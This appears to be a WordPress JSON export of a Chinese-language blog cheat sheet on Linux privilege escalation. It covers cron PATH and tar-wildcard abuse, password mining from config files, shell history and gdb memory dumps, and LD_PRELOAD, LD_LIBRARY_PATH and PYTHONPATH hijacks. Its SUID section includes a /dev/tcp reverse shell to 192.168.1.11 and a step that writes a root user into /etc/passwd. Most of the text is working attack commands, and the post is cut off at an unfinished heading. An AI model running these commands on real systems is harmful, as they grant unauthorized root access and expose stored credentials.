{"id":1738,"date":"2024-12-01T17:56:23","date_gmt":"2024-12-01T09:56:23","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1738"},"modified":"2025-01-07T10:50:22","modified_gmt":"2025-01-07T02:50:22","slug":"linux%e6%8f%90%e6%ac%8a","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1738","title":{"rendered":"linux\u63d0\u6b0a"},"content":{"rendered":"\n<p><br>Linux \u63d0\u6b0a\u662f\u6307\u901a\u904e\u5404\u7a2e\u65b9\u6cd5\u5c07\u7cfb\u7d71\u4e2d\u7684\u4e00\u500b\u666e\u901a\u7528\u6236\u6216\u53d7\u9650\u7528\u6236\u7684\u6b0a\u9650\u63d0\u5347\u70ba\u66f4\u9ad8\u7684\u6b0a\u9650\uff08\u901a\u5e38\u662f root\uff09\uff0c\u4ee5\u7372\u53d6\u5c0d\u6574\u500b\u7cfb\u7d71\u7684\u63a7\u5236\u6b0a\u3002\u5e38\u898b\u7b56\u7565\u6709\u4ee5\u4e0b\u5e7e\u7a2e<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cron <\/li>\n\n\n\n<li>Password Mining<\/li>\n\n\n\n<li>\u74b0\u5883\u8b8a\u91cf<\/li>\n\n\n\n<li>SUID<\/li>\n\n\n\n<li>SUDO<\/li>\n\n\n\n<li>NFS<\/li>\n\n\n\n<li>CVE\u6f0f\u6d1e\u63d0\u6b0a<\/li>\n\n\n\n<li>\u5176\u4ed6<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Cron <\/h2>\n\n\n\n<p><a href=\"https:\/\/yu-shiuan2017.medium.com\/htb-cronos%E9%9D%B6%E6%A9%9F-write-up-4de6734e1a0a\" target=\"_blank\" rel=\"noopener\">https:\/\/yu-shiuan2017.medium.com\/htb-cronos%E9%9D%B6%E6%A9%9F-write-up-4de6734e1a0a<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Cron (Path)<\/h3>\n\n\n\n<p>\u5982\u679c <code>\/etc\/crontab<\/code> \u5167\u6709 <code>PATH<\/code> \u8b8a\u6578\u3002\u800c\u4e14<code>PATH<\/code>\u5305\u542b <code>\/home\/user<\/code> \u6216\u985e\u4f3c\u76ee\u9304\uff0c\u4f8b\u5982<code>PATH=\/home\/user:\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin<\/code><\/p>\n\n\n\n<p>\u5247\u7576 <code>crontab<\/code> \u57f7\u884c\u4e00\u500b\u547d\u4ee4\u6642\uff0c\u5b83\u6703\u5148\u5728\u9019\u4e9b\u76ee\u9304\u4e2d\u67e5\u627e\u8a72\u547d\u4ee4\u3002\u5047\u5982\u6709\u4e00\u500bcron\u4efb\u52d9\u9700\u8981\u57f7\u884c <code>overwrite.sh<\/code> \uff0c\u7cfb\u7d71\u6703\u9996\u5148\u5728 <code>\/home\/user<\/code> \u76ee\u9304\u4e0b\u5c0b\u627e\u8a72\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>\u56e0\u6b64\u53ef\u5728\u81ea\u5df1\u7684\/home\/user\u76ee\u9304\u4e0b\u65b0\u589eoverwith.sh\u505a\u63d0\u6b0a\uff0c\u5982\u4e0b\u6240\u793a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' &gt; \/home\/user\/overwrite.sh\n#chmod +x \/home\/user\/overwrite.sh<\/code><\/pre>\n\n\n\n<p>\u7b49\u5f851\u5206\u9418\u5f8c\uff0coverwrite.sh\u6703\u88ab\u57f7\u884c\uff0c\/tmp\/bash\u5c31\u53ef\u57f7\u884c\/bin\/bash\uff0c\u63a5\u8457\u5c31\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4\u63d0\u6b0a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\/tmp\/bash -p\n$id\nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Cron (Wildcards)<\/h3>\n\n\n\n<p>\u5982\u679c <code>\/etc\/crontab<\/code> \u5167\u767c\u73fe\u6709script\u4f7f\u7528tar\u642d\u914dwilcard (*) \u58d3\u7e2e\/home\/user\/\u4e0b\u7684\u5167\u5bb9\uff0c\u4f8b\u5982<code>tar -czf \/backup\/user_backup.tar.gz \/home\/user\/*<\/code><\/p>\n\n\n\n<p>\u53ef\u5617\u8a66\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' &gt; \/home\/user\/runme.sh\n# touch \/home\/user\/--checkpoint=1\n# touch \/home\/user\/--checkpoint-action=exec=sh\\ runme.sh<\/code><\/pre>\n\n\n\n<p><code>--checkpoint=1<\/code>: \u9019\u500b\u9078\u9805\u5728 GNU <code>tar<\/code> \u4e2d\u901a\u5e38\u7528\u4f86\u6307\u5b9a\u5728\u6bcf\u500b\u6a94\u6848\u8655\u7406\u5b8c\u6210\u5f8c\uff08\u6bcf\u500b &#8220;checkpoint&#8221;\uff09\uff0c<code>tar<\/code> \u61c9\u8a72\u986f\u793a\u4e00\u689d\u8a0a\u606f\u6216\u57f7\u884c\u67d0\u4e9b\u64cd\u4f5c\u3002\u5728\u9019\u500b\u4f8b\u5b50\u4e2d\uff0c<code>1<\/code>\u610f\u5473\u8457\u5728\u6bcf\u8655\u7406\u4e00\u500b\u6a94\u6848\u6642\uff0c<code>tar<\/code> \u5c31\u6703\u57f7\u884c\u6307\u5b9a\u7684\u52d5\u4f5c\u3002<\/p>\n\n\n\n<p><code>--checkpoint-action=exec=sh runme.sh<\/code>: \u9019\u500b\u9078\u9805\u6307\u793a <code>tar<\/code> \u5728\u6bcf\u500b checkpoint \u6642\u57f7\u884c\u7279\u5b9a\u7684\u52d5\u4f5c\u3002<code>exec=sh runme.sh<\/code> \u7684\u610f\u601d\u662f\u8b93 <code>tar<\/code> \u4f7f\u7528 <code>sh shell <\/code>\u4f86\u57f7\u884c\u540d\u70ba <code>runme.sh<\/code> \u7684\u8173\u672c\u3002<\/p>\n\n\n\n<p>\u7b49\u5f851\u5206\u9418\u5f8c\uff0c\u5373\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \/tmp\/bash -p \n$ id \nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Cron (File Overwrite)<\/h3>\n\n\n\n<p>\u5982\u679c <code>\/etc\/crontab<\/code> \u5167\u767c\u73fe\u6709script\u53ef\u4ee5\u88ab\u5beb\u5165\uff0c\u4f8b\u5982<code>\/usr\/local\/bin\/overwrite.sh<\/code>\u662f\u53ef\u4ee5\u88ab\u5beb\u5165\u7684\uff0c\u53ef\u5617\u8a66\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' &gt;&gt; \/usr\/local\/bin\/overwrite.sh<\/code><\/pre>\n\n\n\n<p>\u7b49\u5f851\u5206\u9418\u5f8c\uff0c\u5373\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \/tmp\/bash -p \n$ id \nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Password Mining<\/h2>\n\n\n\n<p>\u900f\u904e\u767c\u73fe\u9ad8\u6b0a\u9650\u5bc6\u78bc\u63d0\u6b0a\uff0c\u5e38\u898b\u65b9\u6cd5\u5982\u4e0b <\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Password Mining (Configuration Files)<\/h3>\n\n\n\n<p>\u5f9e<code>configuration file<\/code>\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n<p><code>cat \/home\/user\/myvpn.ovpn<\/code>\uff0c\u95dc\u6ce8auth-user-pass<\/p>\n\n\n\n<p><code>cat \/etc\/openvpn\/auth.txt<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\n<p><code>cat \/home\/user\/.irssi\/config | grep -i passw<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Password Mining (History)<\/h3>\n\n\n\n<p>\u5f9e\u6b77\u53f2\u8a18\u9304\u4e2d\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p><code>cat ~\/.bash_history | grep -i passw<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Password Mining (Memory)<\/h3>\n\n\n\n<p>\u5f9e\u5167\u5b58\u4e2d\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u5047\u5982\u76ee\u6a19\u6709ftp, \u5148\u67e5\u8a62ftp \u7684 pid<\/p>\n\n\n\n<p>#<code>ps -ef | grep ftp<\/code><\/p>\n\n\n\n<p>\u63a5\u8457\u4f7f\u7528gdb\u627e\u8a18\u61b6\u9ad4\u5167\u7684\u5bc6\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#gdb -p &#91;FTP PID]\n(gdb)info proc mappings<\/code><\/pre>\n\n\n\n<p>\u5c0b\u627eheap\u5340\u57df\u7684\u8d77\u9ede\u548c\u7d42\u9ede\uff0c\u4e00\u65e6\u627e\u5230\u5f8c\u628a\u4ed6\u5b58\u5230\/tmp\/men\uff0c\u5728\u7528strings\u770b\u660e\u6587\u5bc6\u78bc <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(gdb) dump memory \/tmp\/mem &#91;Start Address] &#91;End Address]\n(gdb) q\nstrings \/tmp\/mem | grep passw<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u74b0\u5883\u8b8a\u91cf<\/h2>\n\n\n\n<p>Linux \u7684\u74b0\u5883\u8b8a\u91cf\u63d0\u6b0a\u662f\u4e00\u7a2e\u901a\u904e\u64cd\u4f5c\u6216\u4fee\u6539\u74b0\u5883\u8b8a\u91cf\u4f86\u7372\u53d6\u66f4\u9ad8\u6b0a\u9650\u7684\u6280\u8853\u3002\u5728 Linux \u7cfb\u7d71\u4e2d\uff0c\u74b0\u5883\u8b8a\u91cf\u53ef\u4ee5\u5f71\u97ff\u547d\u4ee4\u7684\u57f7\u884c\u65b9\u5f0f\u6216\u61c9\u7528\u7a0b\u5e8f\u7684\u884c\u70ba\u3002\u5982\u679c\u914d\u7f6e\u4e0d\u7576\uff0c\u53ef\u80fd\u5c0e\u81f4\u7279\u6b0a\u63d0\u5347\u7684\u6f0f\u6d1e\u3002\u4ee5\u4e0b\u662f\u5e7e\u7a2e\u5e38\u898b\u7684\u74b0\u5883\u8b8a\u91cf\u63d0\u6b0a\u65b9\u5f0f\u53ca\u7bc4\u4f8b\uff1a<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">PATH \u74b0\u5883\u8b8a\u91cf\u7684\u6feb\u7528<\/h3>\n\n\n\n<p>PATH \u5b9a\u7fa9\u4e86\u57f7\u884c\u547d\u4ee4\u6642\u641c\u7d22\u7684\u76ee\u9304\u9806\u5e8f\u3002\u5982\u679c\u653b\u64ca\u8005\u80fd\u5920\u5c07\u60e1\u610f\u7a0b\u5f0f\u653e\u5728PATH\u512a\u5148\u4f4d\u7f6e\uff0c\u53ef\u80fd\u6703\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>export PATH=\/tmp:$PATH\necho 'cp \/bin\/bash \/tmp\/bash &amp;&amp; chmod +s \/tmp\/bash' &gt; \/tmp\/ls\nchmod +x \/tmp\/ls\nls<\/code><\/pre>\n\n\n\n<p>\u5982\u679c ls \u5728 \/tmp \u76ee\u9304\u4e2d\u88ab\u512a\u5148\u57f7\u884c\uff0c\u653b\u64ca\u8005\u5c31\u80fd\u5c07 \/bin\/bash \u66ff\u63db\u70ba\u5e36\u6709 SUID \u6b0a\u9650\u7684\u60e1\u610f\u526f\u672c\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">LD_PRELOAD \u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n<p>LD_PRELOAD \u5141\u8a31\u5728\u57f7\u884c\u7a0b\u5f0f\u524d\u52a0\u8f09\u81ea\u5b9a\u7fa9\u7684\u5171\u4eab\u5eab\u3002\u5982\u679c\u6709\u7279\u6b0a\u7684\u7a0b\u5f0f\u672a\u6b63\u78ba\u9650\u5236\u6b64\u8b8a\u91cf\uff0c\u53ef\u80fd\u6703\u88ab\u653b\u64ca\u8005\u5229\u7528\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>1.\u6e96\u5099\u4e00\u500bexploit.c\u4f7f\u7528setuid(0)\uff0c\u53ef\u5c07\u7a0b\u5e8f\u7684\u6709\u6548\u7528\u6236 ID (eUID) \u8a2d\u7f6e\u70ba 0\uff0c\u4e5f\u5c31\u662f root \u7528\u6236\u3002\u9019\u610f\u5473\u8457\uff0c\u5728\u9019\u500b\u51fd\u6578\u57f7\u884c\u5f8c\uff0c\u7a0b\u5e8f\u5c07\u64c1\u6709 root \u7684\u6b0a\u9650\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo 'void _init() { setuid(0); system(\"\/bin\/bash\"); }' &gt; exploit.c<\/code><\/pre>\n\n\n\n<p>2.\u900f\u904e-shared\u8981\u6c42gcc \u7de8\u8b6f\u51fa\u4e00\u500b\u5171\u4eab\u5eab\uff08dynamic library\uff09\uff0c\u4e5f\u5c31\u662f .so \u6a94\u6848\u3002\u5171\u4eab\u5eab\u53ef\u4ee5\u88ab\u5176\u4ed6\u7a0b\u5f0f\u5728\u904b\u884c\u6642\u52d5\u614b\u9023\u7d50\u3002\u4e26\u900f\u904e-fPIC\u53c3\u6578 Position-Independent Code\uff0c\u8981\u6c42\u7de8\u8b6f\u51fa\u7684\u7a0b\u5f0f\u78bc\u53ef\u4ee5\u88ab\u8f09\u5165\u5230\u8a18\u61b6\u9ad4\u7684\u4efb\u610f\u4f4d\u7f6e\uff0c\u9019\u5c0d\u65bc\u5171\u4eab\u5eab\u4f86\u8aaa\u662f\u5f88\u91cd\u8981\u7684\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gcc -shared -o exploit.so -fPIC exploit.c<\/code><\/pre>\n\n\n\n<p>3. \u4f7f\u7528LD_PRELOAD\u6307\u5b9a\u5728\/bin\/su\u7a0b\u5f0f\u8f09\u5165\u6642\uff0c\u8981\u512a\u5148\u8f09\u5165\u7684exploit.so\u5171\u4eab\u5eab\u3002 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>LD_PRELOAD=.\/exploit.so \/bin\/su<\/code><\/pre>\n\n\n\n<p>\u4e0a\u8ff0\u6b65\u9a5f\u7e3d\u7d50\u4f86\u8aaa\uff0c\u5728\u57f7\u884c \/bin\/su \u547d\u4ee4\u6642\uff0c\u5148\u8f09\u5165\u6211\u5011\u81ea\u5b9a\u7fa9\u7684 <code>exploit.so<\/code> \u5171\u4eab\u5eab\u3002\u7531\u65bc\u6211\u5011\u5728 <code>exploit.so<\/code> \u4e2d\u5b9a\u7fa9\u4e86 <code>_init<\/code> \u51fd\u6578\uff0c\u800c\u9019\u500b\u51fd\u6578\u6703\u5c07\u7a0b\u5e8f\u7684\u6b0a\u9650\u63d0\u5347\u70ba root\uff0c\u6240\u4ee5\u7576\u6211\u5011\u57f7\u884c <code>\/bin\/su<\/code> \u6642\uff0c\u5be6\u969b\u4e0a\u6703\u4ee5 root \u7684\u8eab\u4efd\u57f7\u884c\uff0c\u4e26\u4e14\u6703\u958b\u555f\u4e00\u500b bash shell<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">LD_LIBRARY_PATH \u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n<p>LD_LIBRARY_PATH \u5b9a\u7fa9\u4e86\u52a0\u8f09\u5171\u4eab\u5eab\u7684\u8def\u5f91\u3002\u5982\u679c\u653b\u64ca\u8005\u53ef\u4ee5\u8a2d\u7f6e\u6b64\u8b8a\u91cf\uff0c\u53ef\u80fd\u8a98\u5c0e\u57f7\u884c\u4e0d\u53d7\u4fe1\u4efb\u7684\u5eab\u3002<\/p>\n\n\n\n<p>\u5982\u679c\u6709\u8fa6\u6cd5\u767c\u73fe\u5728\u904b\u884c\u6642\u6703\u52d5\u614b\u8f09\u5165\u5171\u4eab\u5eab\u7684\u6f0f\u6d1e\u7a0b\u5f0f\uff08some_vulnerable_program\uff09\uff0c\u4e14\u8f09\u5165\u7684\u5171\u4eab\u5eab\u540d\u7a31\u6070\u597d\u8207\u6211\u5011\u60e1\u610f\u7de8\u8b6f\u7684 <code>libc.so.6<\/code> \u76f8\u540c\uff0c\u90a3\u53ef\u4ee5\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># mkdir \/tmp\/exploit\n# echo 'void my_function() { setuid(0); system(\"\/bin\/bash\"); }' &gt; \/tmp\/exploit\/libc.c\n# gcc -shared -o \/tmp\/exploit\/libc.so.6 -fPIC \/tmp\/exploit\/libc.c\n# export LD_LIBRARY_PATH=\/tmp\/exploit\n# some_vulnerable_program<\/code><\/pre>\n\n\n\n<p><code>LD_LIBRARY_PATH<\/code>: \u9019\u500b\u74b0\u5883\u8b8a\u6578\u6307\u5b9a\u4e86\u7cfb\u7d71\u5728\u904b\u884c\u7a0b\u5f0f\u6642\uff0c\u9664\u4e86\u7cfb\u7d71\u9810\u8a2d\u7684\u5171\u4eab\u5eab\u641c\u5c0b\u8def\u5f91\u4e4b\u5916\uff0c\u9084\u61c9\u8a72\u641c\u5c0b\u54ea\u4e9b\u76ee\u9304\u3002\u9019\u6a23\u4e00\u4f86\uff0c\u7576\u6211\u5011\u57f7\u884c\u5176\u4ed6\u7a0b\u5f0f\u6642\uff0c\u7cfb\u7d71\u5c31\u6703\u512a\u5148\u5728 <code>\/tmp\/exploit<\/code> \u76ee\u9304\u4e0b\u67e5\u627e\u6240\u9700\u7684\u5171\u4eab\u5eab\u3002<\/p>\n\n\n\n<p>\u4e00\u65e6\u6211\u5011\u7684\u60e1\u610f\u5171\u4eab\u5eab\u88ab\u8f09\u5165\uff0c\u5176\u4e2d\u7684\u51fd\u6578\u5c31\u6709\u53ef\u80fd\u5728\u67d0\u4e9b\u7279\u5b9a\u7684\u689d\u4ef6\u4e0b\u88ab\u57f7\u884c\uff0c\u5c0e\u81f4\u7a0b\u5e8f\u7684\u6b0a\u9650\u88ab\u63d0\u5347\uff0c\u4e26\u958b\u555f\u4e00\u500b bash shell\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">PYTHONPATH\/PERL5LIB\/RUBYLIB \u7b49\u8173\u672c\u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n<p>\u9019\u4e9b\u8b8a\u91cf\u63a7\u5236\u8173\u672c\u8a9e\u8a00\u57f7\u884c\u6642\u7684\u6a21\u7d44\u641c\u7d22\u8def\u5f91\u3002\u5982\u679c\u7a0b\u5e8f\u80fd\u900f\u904esudo\u7b49\u9ad8\u6b0a\u9650\u57f7\u884c\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u5229\u7528\u5b83\u5011\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u5047\u5982python\u53ef\u7528sudo\u57f7\u884c\uff0c\u53ef\u4ee5\u900f\u904e\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a <\/p>\n\n\n\n<p>1.\u5728 <code>\/tmp<\/code> \u76ee\u9304\u4e0b\u5275\u5efa\u4e00\u500b\u540d\u70ba <code>exploit.py<\/code> \u7684 Python \u811a\u672c\uff0c\u4e26\u5c07\u6307\u5b9a\u7684 Python \u7a0b\u5f0f\u78bc\u5beb\u5165\u5176\u4e2d\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo 'import os; os.system(\"\/bin\/bash\")' &gt; \/tmp\/exploit.py<\/code><\/pre>\n\n\n\n<p>2.\u5c07\u74b0\u5883\u8b8a\u6578 <code>PYTHONPATH<\/code> \u8a2d\u7f6e\u70ba <code>\/tmp<\/code>\u3002<code>PYTHONPATH<\/code> \u9019\u500b\u74b0\u5883\u8b8a\u6578\u6307\u5b9a\u4e86 Python \u5728\u5c0e\u5165\u6a21\u7d44\u6642\uff0c\u9664\u4e86\u7cfb\u7d71\u9810\u8a2d\u7684\u6a21\u7d44\u641c\u7d22\u8def\u5f91\u4e4b\u5916\uff0c\u9084\u61c9\u8a72\u641c\u5c0b\u54ea\u4e9b\u76ee\u9304\u3002\u901a\u904e\u5c07 <code>\/tmp<\/code> \u76ee\u9304\u6dfb\u52a0\u5230 <code>PYTHONPATH<\/code> \u4e2d\uff0cPython \u89e3\u8b6f\u5668\u5c31\u80fd\u5920\u627e\u5230\u6211\u5011\u525b\u525b\u5275\u5efa\u7684 <code>exploit.py<\/code> \u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>export PYTHONPATH=\/tmp<\/code><\/code><\/pre>\n\n\n\n<p>3.\u4ee5 sudo\u6b0a\u9650\u57f7\u884c Python \u89e3\u8b6f\u5668\uff0c\u4e26\u57f7\u884c\u6307\u5b9a\u7684 Python \u7a0b\u5f0f\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>sudo python -c 'import exploit'<\/code><\/code><\/pre>\n\n\n\n<p>\u9019\u4e09\u884c\u6307\u4ee4\u7684\u7d44\u5408\uff0c\u5be6\u73fe\u4e86\u4e00\u500b\u7c21\u55ae\u7684\u63d0\u6b0a\u653b\u64ca\u3002\u901a\u904e\u5275\u5efa\u4e00\u500b Python \u811a\u672c\uff0c\u5229\u7528 <code>os.system<\/code> \u51fd\u6578\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4\uff0c\u4e26\u4e14\u4ee5 sudo \u6b0a\u9650\u57f7\u884c\u9019\u500b Python \u811a\u672c\uff0c\u6700\u7d42\u9054\u5230\u958b\u555f\u4e00\u500b\u64c1\u6709 root \u6b0a\u9650\u7684 bash shell\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">SUID<strong> \u63d0\u6743<\/strong><\/h2>\n\n\n\n<p>suid \u53ef\u4ee5\u8b93\u6a94\u6848\u547c\u53eb\u8005\u66ab\u6642\u53d6\u5f97\u6a94\u6848\u64c1\u6709\u8005\u7684\u6b0a\u9650\uff0csuid \u63d0\u6b0a\u7684\u60f3\u6cd5\u8b93\u4e00\u822c\u4f7f\u7528\u8005\u57f7\u884c root \u4f7f\u7528\u8005\u6240\u64c1\u6709\u7684 suid \u6587\u4ef6\uff0c\u4ee5\u9054\u5230\u63d0\u6b0a\u7684\u76ee\u7684\u3002<\/p>\n\n\n\n<p>\u5047\u8a2d\u6211\u5011\u73fe\u5728\u6709\u4e00\u500b\u53ef\u57f7\u884c\u6a94ls,\u5176\u5c6c\u4e3b\u70baroot,\u7576\u6211\u5011\u900f\u904e\u975eroot\u4f7f\u7528\u8005\u767b\u5165\u6642,\u5982\u679cls\u8a2d\u5b9a\u4e86SUID\u6b0a\u9650,\u6211\u5011\u53ef\u5728\u975eroot\u4f7f\u7528\u8005\u4e0b\u57f7\u884c\u8a72\u4e8c\u9032\u4f4d\u57f7\u884c\u6a94,\u5728\u57f7\u884c\u6a94\u6642,\u8a72\u9032\u7a0b\u7684\u6b0a\u9650\u5c07\u70baroot\u6b0a\u9650.<\/p>\n\n\n\n<p>\u5c0b\u627e\u6709suid\u7684\u6a94\u6848 <\/p>\n\n\n\n<p><code>find \/ -type f -perm -4000 -ls 2&gt;\/dev\/null<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">find<\/h3>\n\n\n\n<p>\u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ find 1.txt -exec '\/bin\/sh' \\;\nsh-5.0# whoami\nroot<\/code><\/pre>\n\n\n\n<p>\u6216\u662f\u76f4\u63a5\u7528reverse shell<\/p>\n\n\n\n<p><code>find 1.txt -exec bash -i &gt;&amp; \/dev\/tcp\/192.168.1.11\/9999 0&gt;&amp;1 -p \\;<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">less\u548cmore<\/h3>\n\n\n\n<p>\u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n<p><code>less \/etc\/passwd<\/code><\/p>\n\n\n\n<p>\u7136\u5f8c\u5728less\u4e2d\u8f38\u5165:<code>!\/bin\/sh<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">cp<\/h3>\n\n\n\n<p>\u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u76f4\u63a5\u4f7f\u7528cp\u547d\u4ee4\u8986\u84cb\u539f\u4f86\u7684\/etc\/passwd\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[kali@localhost ~]$ cat \/etc\/passwd &gt;passwd<br>[kali@localhost ~]$ openssl passwd -1 -salt hack hack123<br>$1$hack$WTn0dk2QjNeKfl.DHOUue0<br>[kali@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::\/root\/:\/bin\/bash' &gt;&gt; passwd<br>[kali@localhost ~]$ cp passwd \/etc\/passwd<br>[kali@localhost ~]$ su - hack<br>Password:<br>[root@localhost ~]# id<br>uid=0(hack) gid=0(root) groups=0(root)<br>[root@localhost ~]# cat \/etc\/passwd|tail -1<br>hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::\/root\/:\/bin\/bash<\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">awk<\/h3>\n\n\n\n<p>\u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\u5982\u4e0b<\/p>\n\n\n\n<p><code>awk 'BEGIN {system(\"\/bin\/bash\")}'<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\u5176\u4ed6<\/h3>\n\n\n\n<p>\u5229\u7528\u73fe\u6709\u7684linux\u5408\u6cd5\u6307\u4ee4\u63d0\u6b0a\u7684\u65b9\u5f0f\u53ef\u53c3\u8003 <a href=\"https:\/\/gtfobins.github.io\" target=\"_blank\" rel=\"noopener\">https:\/\/gtfobins.github.io<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>refer<br>\u7b80\u8c08SUID\u63d0\u6743 https:\/\/www.freebuf.com\/articles\/web\/272617.html<br>Linux SUID \u63d0\u6743 https:\/\/jlkl.github.io\/2020\/01\/27\/Web_15\/<br>\u6279\u91cf\u5229\u7528\u5de5\u5177:https:\/\/github.com\/Jewel591\/suidcheck<br>\u4e94\u79cd\u5b9e\u7528\u578blinux\u63d0\u6743\u65b9\u6cd5 https:\/\/www.wangan.com\/p\/7fy747408cfd6254<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 